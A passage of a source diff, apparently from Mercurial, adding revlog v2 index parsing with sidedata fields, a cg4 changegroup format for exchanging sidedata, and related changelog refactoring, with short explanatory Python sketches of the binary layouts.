Py_ssize_t pos = 0;
Py_ssize_t end = self->buf.len;
- long incr = v1_hdrsize;
+ long incr = self->hdrsize;
Py_ssize_t len = 0;
- while (pos + v1_hdrsize <= end && pos >= 0) {
- uint32_t comp_len;
+ while (pos + self->hdrsize <= end && pos >= 0) {
+ uint32_t comp_len, sidedata_comp_len = 0;
/* 3rd element of header is length of compressed inline data */
comp_len = getbe32(data + pos + 8);
- incr = v1_hdrsize + comp_len;
+ if (self->hdrsize == v2_hdrsize) {
+ sidedata_comp_len = getbe32(data + pos + 72);
+ }
+ incr = self->hdrsize + comp_len + sidedata_comp_len;
if (offsets)
offsets[len] = data + pos;
len++;
@@ -2586,11 +2677,13 @@
return len;
}
-static int index_init(indexObject *self, PyObject *args)
+static int index_init(indexObject *self, PyObject *args, PyObject *kwargs)
{
- PyObject *data_obj, *inlined_obj;
+ PyObject *data_obj, *inlined_obj, *revlogv2;
Py_ssize_t size;
+ static char *kwlist[] = {"data", "inlined", "revlogv2", NULL};
+
/* Initialize before argument-checking to avoid index_dealloc() crash.
*/
self->added = NULL;
@@ -2606,7 +2699,9 @@
self->nodelen = 20;
self->nullentry = NULL;
- if (!PyArg_ParseTuple(args, "OO", &data_obj, &inlined_obj))
+ revlogv2 = NULL;
+ if (!PyArg_ParseTupleAndKeywords(args, kwargs, "OO|O", kwlist,
+ &data_obj, &inlined_obj, &revlogv2))
return -1;
if (!PyObject_CheckBuffer(data_obj)) {
PyErr_SetString(PyExc_TypeError,
@@ -2618,8 +2713,22 @@
return -1;
}
- self->nullentry = Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0,
- -1, -1, -1, -1, nullid, self->nodelen);
+ if (revlogv2 && PyObject_IsTrue(revlogv2)) {
+ self->hdrsize = v2_hdrsize;
+ } else {
+ self->hdrsize = v1_hdrsize;
+ }
+
+ if (self->hdrsize == v1_hdrsize) {
+ self->nullentry =
+ Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1,
+ -1, -1, -1, nullid, self->nodelen);
+ } else {
+ self->nullentry =
+ Py_BuildValue(PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0,
+ -1, -1, -1, -1, nullid, self->nodelen, 0, 0);
+ }
+
if (!self->nullentry)
return -1;
PyObject_GC_UnTrack(self->nullentry);
@@ -2641,11 +2750,11 @@
goto bail;
self->length = len;
} else {
- if (size % v1_hdrsize) {
+ if (size % self->hdrsize) {
PyErr_SetString(PyExc_ValueError, "corrupt index file");
goto bail;
}
- self->length = size / v1_hdrsize;
+ self->length = size / self->hdrsize;
}
return 0;
@@ -2730,6 +2839,8 @@
"compute phases"},
{"reachableroots2", (PyCFunction)reachableroots2, METH_VARARGS,
"reachableroots"},
+ {"replace_sidedata_info", (PyCFunction)index_replace_sidedata_info,
+ METH_VARARGS, "replace an existing index entry with a new value"},
{"headrevs", (PyCFunction)index_headrevs, METH_VARARGS,
"get head revisions"}, /* Can do filtering since 3.2 */
{"headrevsfiltered", (PyCFunction)index_headrevs, METH_VARARGS,
@@ -2756,6 +2867,12 @@
{NULL} /* Sentinel */
};
+static PyMemberDef index_members[] = {
+ {"entry_size", T_LONG, offsetof(indexObject, hdrsize), 0,
+ "size of an index entry"},
+ {NULL} /* Sentinel */
+};
+
PyTypeObject HgRevlogIndex_Type = {
PyVarObject_HEAD_INIT(NULL, 0) /* header */
"parsers.index", /* tp_name */
@@ -2785,7 +2902,7 @@
0, /* tp_iter */
0, /* tp_iternext */
index_methods, /* tp_methods */
- 0, /* tp_members */
+ index_members, /* tp_members */
index_getset, /* tp_getset */
0, /* tp_base */
0, /* tp_dict */
@@ -2797,16 +2914,16 @@
};
/*
- * returns a tuple of the form (index, index, cache) with elements as
+ * returns a tuple of the form (index, cache) with elements as
* follows:
*
- * index: an index object that lazily parses RevlogNG records
+ * index: an index object that lazily parses Revlog (v1 or v2) records
* cache: if data is inlined, a tuple (0, index_file_content), else None
* index_file_content could be a string, or a buffer
*
* added complications are for backwards compatibility
*/
-PyObject *parse_index2(PyObject *self, PyObject *args)
+PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs)
{
PyObject *cache = NULL;
indexObject *idx;
@@ -2816,7 +2933,7 @@
if (idx == NULL)
goto bail;
- ret = index_init(idx, args);
+ ret = index_init(idx, args, kwargs);
if (ret == -1)
goto bail;
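
For reference, the v2 index entry is the 64-byte v1 entry plus an 8-byte sidedata offset at byte 64, a 4-byte compressed sidedata length at byte 72, and padding to 96 bytes, matching the putbe64/putbe32/memset sequence above. A standalone Python model of the two layouts (field values are arbitrary):

    import struct

    # v1: 8-byte offset/flags, six 4-byte ints (comp/uncomp len, base/link
    # rev, p1/p2), a 20-byte node and 12 bytes of padding = 64 bytes.
    V1 = struct.Struct('>Q iiii ii 20s 12x')
    # v2 tail: sidedata offset, compressed sidedata length, 20 bytes padding.
    V2_TAIL = struct.Struct('>Q I 20x')

    assert V1.size == 64
    assert V1.size + V2_TAIL.size == 96

    node = b'\x11' * 20
    v1_entry = V1.pack(0, 30, 60, 0, 0, -1, -1, node)
    v2_entry = v1_entry + V2_TAIL.pack(4096, 128)

    # the same offsets the C code reads with getbe64(data + 64) and
    # getbe32(data + 72)
    assert struct.unpack_from('>QI', v2_entry, 64) == (4096, 128)
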
--- a/mercurial/changegroup.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/changegroup.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,13 @@
# changegroup.py - Mercurial changegroup manipulation functions
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
+import collections
import os
import struct
import weakref
@@ -32,6 +33,7 @@
)
from .interfaces import repository
+from .revlogutils import sidedata as sidedatamod
_CHANGEGROUPV1_DELTA_HEADER = struct.Struct(b"20s20s20s20s")
_CHANGEGROUPV2_DELTA_HEADER = struct.Struct(b"20s20s20s20s20s")
@@ -202,7 +204,9 @@
header = self.deltaheader.unpack(headerdata)
delta = readexactly(self._stream, l - self.deltaheadersize)
node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
- return (node, p1, p2, cs, deltabase, delta, flags)
+ # cg4 forward-compat
+ sidedata = {}
+ return (node, p1, p2, cs, deltabase, delta, flags, sidedata)
def getchunks(self):
"""returns all the chunks contains in the bundle
@@ -249,7 +253,7 @@
pos = next
yield closechunk()
- def _unpackmanifests(self, repo, revmap, trp, prog):
+ def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None):
self.callback = prog.increment
# no need to check for empty manifest group here:
# if the result of the merge of 1 and 2 is the same in 3 and 4,
@@ -257,7 +261,8 @@
# be empty during the pull
self.manifestheader()
deltas = self.deltaiter()
- repo.manifestlog.getstorage(b'').addgroup(deltas, revmap, trp)
+ storage = repo.manifestlog.getstorage(b'')
+ storage.addgroup(deltas, revmap, trp, addrevisioncb=addrevisioncb)
prog.complete()
self.callback = None
@@ -269,6 +274,7 @@
url,
targetphase=phases.draft,
expectedtotal=None,
+ sidedata_categories=None,
):
"""Add the changegroup returned by source.read() to this repo.
srctype is a string like 'push', 'pull', or 'unbundle'. url is
@@ -279,9 +285,23 @@
- more heads than before: 1+added heads (2..n)
- fewer heads than before: -1-removed heads (-2..-n)
- number of heads stays the same: 1
+
+ `sidedata_categories` is an optional set of the sidedata categories
+ wanted by the remote.
"""
repo = repo.unfiltered()
+ # Only useful if we're adding sidedata categories. If both peers have
+ # the same categories, then we simply don't do anything.
+ if self.version == b'04' and srctype == b'pull':
+ sidedata_helpers = get_sidedata_helpers(
+ repo,
+ sidedata_categories or set(),
+ pull=True,
+ )
+ else:
+ sidedata_helpers = None
+
def csmap(x):
repo.ui.debug(b"add changeset %s\n" % short(x))
return len(cl)
@@ -316,14 +336,16 @@
self.callback = progress.increment
efilesset = set()
- cgnodes = []
+ duprevs = []
- def ondupchangelog(cl, node):
- if cl.rev(node) < clstart:
- cgnodes.append(node)
+ def ondupchangelog(cl, rev):
+ if rev < clstart:
+ duprevs.append(rev)
- def onchangelog(cl, node):
- efilesset.update(cl.readfiles(node))
+ def onchangelog(cl, rev):
+ ctx = cl.changelogrevision(rev)
+ efilesset.update(ctx.files)
+ repo.register_changeset(rev, ctx)
self.changelogheader()
deltas = self.deltaiter()
@@ -331,6 +353,7 @@
deltas,
csmap,
trp,
+ alwayscache=True,
addrevisioncb=onchangelog,
duplicaterevisioncb=ondupchangelog,
):
@@ -348,6 +371,13 @@
efilesset = None
self.callback = None
+ # Keep track of the (non-changelog) revlogs we've updated and their
+ # range of new revisions for sidedata rewrite.
+ # TODO do something more efficient than keeping the reference to
+ # the revlogs, especially memory-wise.
+ touched_manifests = {}
+ touched_filelogs = {}
+
# pull off the manifest group
repo.ui.status(_(b"adding manifests\n"))
# We know that we'll never have more manifests than we had
@@ -355,7 +385,24 @@
progress = repo.ui.makeprogress(
_(b'manifests'), unit=_(b'chunks'), total=changesets
)
- self._unpackmanifests(repo, revmap, trp, progress)
+ on_manifest_rev = None
+ if sidedata_helpers and b'manifest' in sidedata_helpers[1]:
+
+ def on_manifest_rev(manifest, rev):
+ range = touched_manifests.get(manifest)
+ if not range:
+ touched_manifests[manifest] = (rev, rev)
+ else:
+ assert rev == range[1] + 1
+ touched_manifests[manifest] = (range[0], rev)
+
+ self._unpackmanifests(
+ repo,
+ revmap,
+ trp,
+ progress,
+ addrevisioncb=on_manifest_rev,
+ )
needfiles = {}
if repo.ui.configbool(b'server', b'validate'):
@@ -369,12 +416,37 @@
for f, n in pycompat.iteritems(mfest):
needfiles.setdefault(f, set()).add(n)
+ on_filelog_rev = None
+ if sidedata_helpers and b'filelog' in sidedata_helpers[1]:
+
+ def on_filelog_rev(filelog, rev):
+ range = touched_filelogs.get(filelog)
+ if not range:
+ touched_filelogs[filelog] = (rev, rev)
+ else:
+ assert rev == range[1] + 1
+ touched_filelogs[filelog] = (range[0], rev)
+
# process the files
repo.ui.status(_(b"adding file changes\n"))
newrevs, newfiles = _addchangegroupfiles(
- repo, self, revmap, trp, efiles, needfiles
+ repo,
+ self,
+ revmap,
+ trp,
+ efiles,
+ needfiles,
+ addrevisioncb=on_filelog_rev,
)
+ if sidedata_helpers:
+ if b'changelog' in sidedata_helpers[1]:
+ cl.rewrite_sidedata(sidedata_helpers, clstart, clend - 1)
+ for mf, (startrev, endrev) in touched_manifests.items():
+ mf.rewrite_sidedata(sidedata_helpers, startrev, endrev)
+ for fl, (startrev, endrev) in touched_filelogs.items():
+ fl.rewrite_sidedata(sidedata_helpers, startrev, endrev)
+
# making sure the value exists
tr.changes.setdefault(b'changegroup-count-changesets', 0)
tr.changes.setdefault(b'changegroup-count-revisions', 0)
@@ -445,8 +517,12 @@
if added:
phases.registernew(repo, tr, targetphase, added)
if phaseall is not None:
- phases.advanceboundary(repo, tr, phaseall, cgnodes, revs=added)
- cgnodes = []
+ if duprevs:
+ duprevs.extend(added)
+ else:
+ duprevs = added
+ phases.advanceboundary(repo, tr, phaseall, [], revs=duprevs)
+ duprevs = []
if changesets > 0:
@@ -494,7 +570,7 @@
"""
chain = None
for chunkdata in iter(lambda: self.deltachunk(chain), {}):
- # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
+ # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags, sidedata)
yield chunkdata
chain = chunkdata[0]
@@ -534,17 +610,44 @@
node, p1, p2, deltabase, cs, flags = headertuple
return node, p1, p2, deltabase, cs, flags
- def _unpackmanifests(self, repo, revmap, trp, prog):
- super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog)
+ def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None):
+ super(cg3unpacker, self)._unpackmanifests(
+ repo, revmap, trp, prog, addrevisioncb=addrevisioncb
+ )
for chunkdata in iter(self.filelogheader, {}):
# If we get here, there are directory manifests in the changegroup
d = chunkdata[b"filename"]
repo.ui.debug(b"adding %s revisions\n" % d)
deltas = self.deltaiter()
- if not repo.manifestlog.getstorage(d).addgroup(deltas, revmap, trp):
+ if not repo.manifestlog.getstorage(d).addgroup(
+ deltas, revmap, trp, addrevisioncb=addrevisioncb
+ ):
raise error.Abort(_(b"received dir revlog group is empty"))
+class cg4unpacker(cg3unpacker):
+ """Unpacker for cg4 streams.
+
+ cg4 streams add support for exchanging sidedata.
+ """
+
+ version = b'04'
+
+ def deltachunk(self, prevnode):
+ res = super(cg4unpacker, self).deltachunk(prevnode)
+ if not res:
+ return res
+
+ (node, p1, p2, cs, deltabase, delta, flags, _sidedata) = res
+
+ sidedata_raw = getchunk(self._stream)
+ sidedata = {}
+ if len(sidedata_raw) > 0:
+ sidedata = sidedatamod.deserialize_sidedata(sidedata_raw)
+
+ return node, p1, p2, cs, deltabase, delta, flags, sidedata
+
+
class headerlessfixup(object):
def __init__(self, fh, h):
self._h = h
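
The cg4 framing introduced above reuses the existing changegroup chunk protocol: each delta is followed by one extra chunk whose body is the serialized sidedata, and a zero-length chunk means "no sidedata". A simplified, self-contained sketch of that framing (the payload bytes are stand-ins for the real delta and sidedata codecs, and this reader skips the length validation the real getchunk performs):

    import io
    import struct

    def chunkheader(length):
        # changegroup chunk header: payload length plus the 4 header bytes
        return struct.pack(">l", length + 4)

    def getchunk(stream):
        l = struct.unpack(">l", stream.read(4))[0]
        if l <= 4:
            return b""  # zero-length chunk: no payload
        return stream.read(l - 4)

    # writer: delta chunk, then the dedicated sidedata chunk (cg4 only)
    delta = b"fake-delta-bytes"
    sidedata_raw = b"fake-serialized-sidedata"
    out = io.BytesIO()
    out.write(chunkheader(len(delta)) + delta)
    out.write(chunkheader(len(sidedata_raw)) + sidedata_raw)

    # reader, mirroring cg4unpacker.deltachunk: delta first, then sidedata
    stream = io.BytesIO(out.getvalue())
    assert getchunk(stream) == delta
    assert getchunk(stream) == sidedata_raw
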
@@ -559,7 +662,7 @@
return readexactly(self._fh, n)
-def _revisiondeltatochunks(delta, headerfn):
+def _revisiondeltatochunks(repo, delta, headerfn):
"""Serialize a revisiondelta to changegroup chunks."""
# The captured revision delta may be encoded as a delta against
@@ -585,6 +688,13 @@
yield prefix
yield data
+ sidedata = delta.sidedata
+ if sidedata is not None:
+ # Need a separate chunk for sidedata to be able to differentiate
+ # "raw delta" length and sidedata length
+ yield chunkheader(len(sidedata))
+ yield sidedata
+
def _sortnodesellipsis(store, nodes, cl, lookup):
"""Sort nodes for changegroup generation."""
@@ -678,7 +788,7 @@
# We failed to resolve a parent for this node, so
# we crash the changegroup construction.
raise error.Abort(
- b'unable to resolve parent while packing %r %r'
+ b"unable to resolve parent while packing '%s' %r"
b' for changeset %r' % (store.indexfile, rev, clrev)
)
@@ -709,6 +819,7 @@
clrevtolocalrev=None,
fullclnodes=None,
precomputedellipsis=None,
+ sidedata_helpers=None,
):
"""Calculate deltas for a set of revisions.
@@ -716,6 +827,8 @@
If topic is not None, progress detail will be generated using this
topic name (e.g. changesets, manifests, etc).
+
+ See `storageutil.emitrevisions` for the doc on `sidedata_helpers`.
"""
if not nodes:
return
@@ -814,6 +927,7 @@
revisiondata=True,
assumehaveparentrevisions=not ellipses,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
)
for i, revision in enumerate(revisions):
@@ -854,6 +968,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
"""Given a source repo, construct a bundler.
@@ -886,6 +1001,8 @@
nodes. We store this rather than the set of nodes that should be
ellipsis because for very large histories we expect this to be
significantly smaller.
+
+ remote_sidedata is the set of sidedata categories wanted by the remote.
"""
assert oldmatcher
assert matcher
@@ -902,6 +1019,9 @@
if bundlecaps is None:
bundlecaps = set()
self._bundlecaps = bundlecaps
+ if remote_sidedata is None:
+ remote_sidedata = set()
+ self._remote_sidedata = remote_sidedata
self._isshallow = shallow
self._fullclnodes = fullnodes
@@ -928,11 +1048,26 @@
self._verbosenote(_(b'uncompressed size of bundle content:\n'))
size = 0
+ sidedata_helpers = None
+ if self.version == b'04':
+ remote_sidedata = self._remote_sidedata
+ if source == b'strip':
+ # We're our own remote when stripping, get the no-op helpers
+ # TODO a better approach would be for the strip bundle to
+ # correctly advertise its sidedata categories directly.
+ remote_sidedata = repo._wanted_sidedata
+ sidedata_helpers = get_sidedata_helpers(repo, remote_sidedata)
+
clstate, deltas = self._generatechangelog(
- cl, clnodes, generate=changelog
+ cl,
+ clnodes,
+ generate=changelog,
+ sidedata_helpers=sidedata_helpers,
)
for delta in deltas:
- for chunk in _revisiondeltatochunks(delta, self._builddeltaheader):
+ for chunk in _revisiondeltatochunks(
+ self._repo, delta, self._builddeltaheader
+ ):
size += len(chunk)
yield chunk
@@ -977,17 +1112,20 @@
fnodes,
source,
clstate[b'clrevtomanifestrev'],
+ sidedata_helpers=sidedata_helpers,
)
for tree, deltas in it:
if tree:
- assert self.version == b'03'
+ assert self.version in (b'03', b'04')
chunk = _fileheader(tree)
size += len(chunk)
yield chunk
for delta in deltas:
- chunks = _revisiondeltatochunks(delta, self._builddeltaheader)
+ chunks = _revisiondeltatochunks(
+ self._repo, delta, self._builddeltaheader
+ )
for chunk in chunks:
size += len(chunk)
yield chunk
@@ -1002,7 +1140,7 @@
mfdicts = None
if self._ellipses and self._isshallow:
mfdicts = [
- (self._repo.manifestlog[n].read(), lr)
+ (repo.manifestlog[n].read(), lr)
for (n, lr) in pycompat.iteritems(manifests)
]
@@ -1017,6 +1155,7 @@
fastpathlinkrev,
fnodes,
clrevs,
+ sidedata_helpers=sidedata_helpers,
)
for path, deltas in it:
@@ -1025,7 +1164,9 @@
yield h
for delta in deltas:
- chunks = _revisiondeltatochunks(delta, self._builddeltaheader)
+ chunks = _revisiondeltatochunks(
+ self._repo, delta, self._builddeltaheader
+ )
for chunk in chunks:
size += len(chunk)
yield chunk
@@ -1041,7 +1182,9 @@
if clnodes:
repo.hook(b'outgoing', node=hex(clnodes[0]), source=source)
- def _generatechangelog(self, cl, nodes, generate=True):
+ def _generatechangelog(
+ self, cl, nodes, generate=True, sidedata_helpers=None
+ ):
"""Generate data for changelog chunks.
Returns a 2-tuple of a dict containing state and an iterable of
@@ -1050,6 +1193,8 @@
if generate is False, the state will be fully populated and no chunk
stream will be yielded
+
+ See `storageutil.emitrevisions` for the doc on `sidedata_helpers`.
"""
clrevorder = {}
manifests = {}
@@ -1133,6 +1278,7 @@
clrevtolocalrev={},
fullclnodes=self._fullclnodes,
precomputedellipsis=self._precomputedellipsis,
+ sidedata_helpers=sidedata_helpers,
)
return state, gen
@@ -1146,11 +1292,14 @@
fnodes,
source,
clrevtolocalrev,
+ sidedata_helpers=None,
):
"""Returns an iterator of changegroup chunks containing manifests.
`source` is unused here, but is used by extensions like remotefilelog to
change what is sent based on pulls vs pushes, etc.
+
+ See `storageutil.emitrevisions` for the doc on `sidedata_helpers`.
"""
repo = self._repo
mfl = repo.manifestlog
@@ -1240,6 +1389,7 @@
clrevtolocalrev=clrevtolocalrev,
fullclnodes=self._fullclnodes,
precomputedellipsis=self._precomputedellipsis,
+ sidedata_helpers=sidedata_helpers,
)
if not self._oldmatcher.visitdir(store.tree[:-1]):
@@ -1278,6 +1428,7 @@
fastpathlinkrev,
fnodes,
clrevs,
+ sidedata_helpers=None,
):
changedfiles = [
f
@@ -1372,6 +1523,7 @@
clrevtolocalrev=clrevtolocalrev,
fullclnodes=self._fullclnodes,
precomputedellipsis=self._precomputedellipsis,
+ sidedata_helpers=sidedata_helpers,
)
yield fname, deltas
@@ -1388,6 +1540,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
builddeltaheader = lambda d: _CHANGEGROUPV1_DELTA_HEADER.pack(
d.node, d.p1node, d.p2node, d.linknode
@@ -1418,6 +1571,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
builddeltaheader = lambda d: _CHANGEGROUPV2_DELTA_HEADER.pack(
d.node, d.p1node, d.p2node, d.basenode, d.linknode
@@ -1447,6 +1601,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack(
d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags
@@ -1467,12 +1622,47 @@
)
+def _makecg4packer(
+ repo,
+ oldmatcher,
+ matcher,
+ bundlecaps,
+ ellipses=False,
+ shallow=False,
+ ellipsisroots=None,
+ fullnodes=None,
+ remote_sidedata=None,
+):
+ # Same header func as cg3. Sidedata is in a separate chunk from the delta to
+ # differentiate "raw delta" and sidedata.
+ builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack(
+ d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags
+ )
+
+ return cgpacker(
+ repo,
+ oldmatcher,
+ matcher,
+ b'04',
+ builddeltaheader=builddeltaheader,
+ manifestsend=closechunk(),
+ bundlecaps=bundlecaps,
+ ellipses=ellipses,
+ shallow=shallow,
+ ellipsisroots=ellipsisroots,
+ fullnodes=fullnodes,
+ remote_sidedata=remote_sidedata,
+ )
+
+
_packermap = {
b'01': (_makecg1packer, cg1unpacker),
# cg2 adds support for exchanging generaldelta
b'02': (_makecg2packer, cg2unpacker),
# cg3 adds support for exchanging revlog flags and treemanifests
b'03': (_makecg3packer, cg3unpacker),
+ # cg4 adds support for exchanging sidedata
+ b'04': (_makecg4packer, cg4unpacker),
}
@@ -1492,11 +1682,9 @@
#
# (or even to push subset of history)
needv03 = True
- if b'exp-sidedata-flag' in repo.requirements:
- needv03 = True
- # don't attempt to use 01/02 until we do sidedata cleaning
- versions.discard(b'01')
- versions.discard(b'02')
+ has_revlogv2 = requirements.REVLOGV2_REQUIREMENT in repo.requirements
+ if not has_revlogv2:
+ versions.discard(b'04')
if not needv03:
versions.discard(b'03')
return versions
@@ -1543,7 +1731,7 @@
# will support. For example, all hg versions that support generaldelta also
# support changegroup 02.
versions = supportedoutgoingversions(repo)
- if b'generaldelta' in repo.requirements:
+ if requirements.GENERALDELTA_REQUIREMENT in repo.requirements:
versions.discard(b'01')
assert versions
return min(versions)
@@ -1559,6 +1747,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
assert version in supportedoutgoingversions(repo)
@@ -1595,6 +1784,7 @@
shallow=shallow,
ellipsisroots=ellipsisroots,
fullnodes=fullnodes,
+ remote_sidedata=remote_sidedata,
)
@@ -1638,8 +1828,15 @@
fastpath=False,
bundlecaps=None,
matcher=None,
+ remote_sidedata=None,
):
- bundler = getbundler(version, repo, bundlecaps=bundlecaps, matcher=matcher)
+ bundler = getbundler(
+ version,
+ repo,
+ bundlecaps=bundlecaps,
+ matcher=matcher,
+ remote_sidedata=remote_sidedata,
+ )
repo = repo.unfiltered()
commonrevs = outgoing.common
@@ -1658,7 +1855,15 @@
return bundler.generate(commonrevs, csets, fastpathlinkrev, source)
-def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
+def _addchangegroupfiles(
+ repo,
+ source,
+ revmap,
+ trp,
+ expectedfiles,
+ needfiles,
+ addrevisioncb=None,
+):
revisions = 0
files = 0
progress = repo.ui.makeprogress(
@@ -1673,7 +1878,13 @@
o = len(fl)
try:
deltas = source.deltaiter()
- if not fl.addgroup(deltas, revmap, trp):
+ added = fl.addgroup(
+ deltas,
+ revmap,
+ trp,
+ addrevisioncb=addrevisioncb,
+ )
+ if not added:
raise error.Abort(_(b"received file revlog group is empty"))
except error.CensoredBaseError as e:
raise error.Abort(_(b"received delta base is censored: %s") % e)
@@ -1702,3 +1913,25 @@
)
return revisions, files
+
+
+def get_sidedata_helpers(repo, remote_sd_categories, pull=False):
+ # Computers for computing sidedata on-the-fly
+ sd_computers = collections.defaultdict(list)
+ # Computers for categories to remove from sidedata
+ sd_removers = collections.defaultdict(list)
+
+ to_generate = remote_sd_categories - repo._wanted_sidedata
+ to_remove = repo._wanted_sidedata - remote_sd_categories
+ if pull:
+ to_generate, to_remove = to_remove, to_generate
+
+ for revlog_kind, computers in repo._sidedata_computers.items():
+ for category, computer in computers.items():
+ if category in to_generate:
+ sd_computers[revlog_kind].append(computer)
+ if category in to_remove:
+ sd_removers[revlog_kind].append(computer)
+
+ sidedata_helpers = (repo, sd_computers, sd_removers)
+ return sidedata_helpers
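
The helper above boils down to set arithmetic over sidedata categories, with the direction flipped on pull. A minimal sketch with hypothetical category names (the real helper also collects per-revlog computer callbacks, omitted here):

    def split_categories(local_wanted, remote_wanted, pull=False):
        to_generate = remote_wanted - local_wanted
        to_remove = local_wanted - remote_wanted
        if pull:
            # on pull the incoming stream is transformed for the local side
            to_generate, to_remove = to_remove, to_generate
        return to_generate, to_remove

    local = {b'copies', b'checksums'}   # hypothetical categories
    remote = {b'copies'}

    # push: nothing to add for the remote; strip b'checksums' before sending
    assert split_categories(local, remote) == (set(), {b'checksums'})
    # pull: compute b'checksums' locally since the remote won't send it
    assert split_categories(local, remote, pull=True) == ({b'checksums'}, set())
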
--- a/mercurial/changelog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/changelog.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# changelog.py - changelog class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -191,7 +191,7 @@
# Extensions might modify _defaultextra, so let the constructor below pass
# it in
extra = attr.ib()
- manifest = attr.ib(default=nullid)
+ manifest = attr.ib()
user = attr.ib(default=b'')
date = attr.ib(default=(0, 0))
files = attr.ib(default=attr.Factory(list))
@@ -200,6 +200,7 @@
p1copies = attr.ib(default=None)
p2copies = attr.ib(default=None)
description = attr.ib(default=b'')
+ branchinfo = attr.ib(default=(_defaultextra[b'branch'], False))
class changelogrevision(object):
@@ -218,9 +219,9 @@
'_changes',
)
- def __new__(cls, text, sidedata, cpsd):
+ def __new__(cls, cl, text, sidedata, cpsd):
if not text:
- return _changelogrevision(extra=_defaultextra)
+ return _changelogrevision(extra=_defaultextra, manifest=nullid)
self = super(changelogrevision, cls).__new__(cls)
# We could return here and implement the following as an __init__.
@@ -372,9 +373,14 @@
def description(self):
return encoding.tolocal(self._text[self._offsets[3] + 2 :])
+ @property
+ def branchinfo(self):
+ extra = self.extra
+ return encoding.tolocal(extra.get(b"branch")), b'close' in extra
+
class changelog(revlog.revlog):
- def __init__(self, opener, trypending=False):
+ def __init__(self, opener, trypending=False, concurrencychecker=None):
"""Load a changelog revlog using an opener.
If ``trypending`` is true, we attempt to load the index from a
@@ -383,6 +389,9 @@
revision) data for a transaction that hasn't been finalized yet.
It exists in a separate file to facilitate readers (such as
hooks processes) accessing data before a transaction is finalized.
+
+ ``concurrencychecker`` will be passed to the revlog init function, see
+ the documentation there.
"""
if trypending and opener.exists(b'00changelog.i.a'):
indexfile = b'00changelog.i.a'
@@ -398,6 +407,7 @@
checkambig=True,
mmaplargeindex=True,
persistentnodemap=opener.options.get(b'persistent-nodemap', False),
+ concurrencychecker=concurrencychecker,
)
if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1):
@@ -418,6 +428,7 @@
self._filteredrevs = frozenset()
self._filteredrevs_hashcache = {}
self._copiesstorage = opener.options.get(b'copies-storage')
+ self.revlog_kind = b'changelog'
@property
def filteredrevs(self):
@@ -497,7 +508,7 @@
if not self._delayed:
revlog.revlog._enforceinlinesize(self, tr, fp)
- def read(self, node):
+ def read(self, nodeorrev):
"""Obtain data from a parsed changelog revision.
Returns a 6-tuple of:
@@ -513,9 +524,9 @@
``changelogrevision`` instead, as it is faster for partial object
access.
"""
- d, s = self._revisiondata(node)
+ d, s = self._revisiondata(nodeorrev)
c = changelogrevision(
- d, s, self._copiesstorage == b'changeset-sidedata'
+ self, d, s, self._copiesstorage == b'changeset-sidedata'
)
return (c.manifest, c.user, c.date, c.files, c.description, c.extra)
@@ -523,14 +534,14 @@
"""Obtain a ``changelogrevision`` for a node or revision."""
text, sidedata = self._revisiondata(nodeorrev)
return changelogrevision(
- text, sidedata, self._copiesstorage == b'changeset-sidedata'
+ self, text, sidedata, self._copiesstorage == b'changeset-sidedata'
)
- def readfiles(self, node):
+ def readfiles(self, nodeorrev):
"""
short version of read that only returns the files modified by the cset
"""
- text = self.revision(node)
+ text = self.revision(nodeorrev)
if not text:
return []
last = text.index(b"\n\n")
@@ -592,21 +603,21 @@
parseddate = b"%s %s" % (parseddate, extra)
l = [hex(manifest), user, parseddate] + sortedfiles + [b"", desc]
text = b"\n".join(l)
- return self.addrevision(
+ rev = self.addrevision(
text, transaction, len(self), p1, p2, sidedata=sidedata, flags=flags
)
+ return self.node(rev)
def branchinfo(self, rev):
"""return the branch name and open/close state of a revision
This function exists because creating a changectx object
just to access this is costly."""
- extra = self.changelogrevision(rev).extra
- return encoding.tolocal(extra.get(b"branch")), b'close' in extra
+ return self.changelogrevision(rev).branchinfo
- def _nodeduplicatecallback(self, transaction, node):
+ def _nodeduplicatecallback(self, transaction, rev):
# keep track of revisions that got "re-added", e.g. unbundle of known rev.
#
# We track them in a list to preserve their order from the source bundle
duplicates = transaction.changes.setdefault(b'revduplicates', [])
- duplicates.append(self.rev(node))
+ duplicates.append(rev)
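
The branchinfo move above preserves the old semantics: the branch name comes from the changeset's extra dict (defaulting to b'default') and a changeset closes its branch iff a b'close' key is present. A standalone sketch of that rule (minus the encoding.tolocal() call the real property applies):

    def branchinfo(extra):
        return extra.get(b'branch', b'default'), b'close' in extra

    assert branchinfo({b'branch': b'stable'}) == (b'stable', False)
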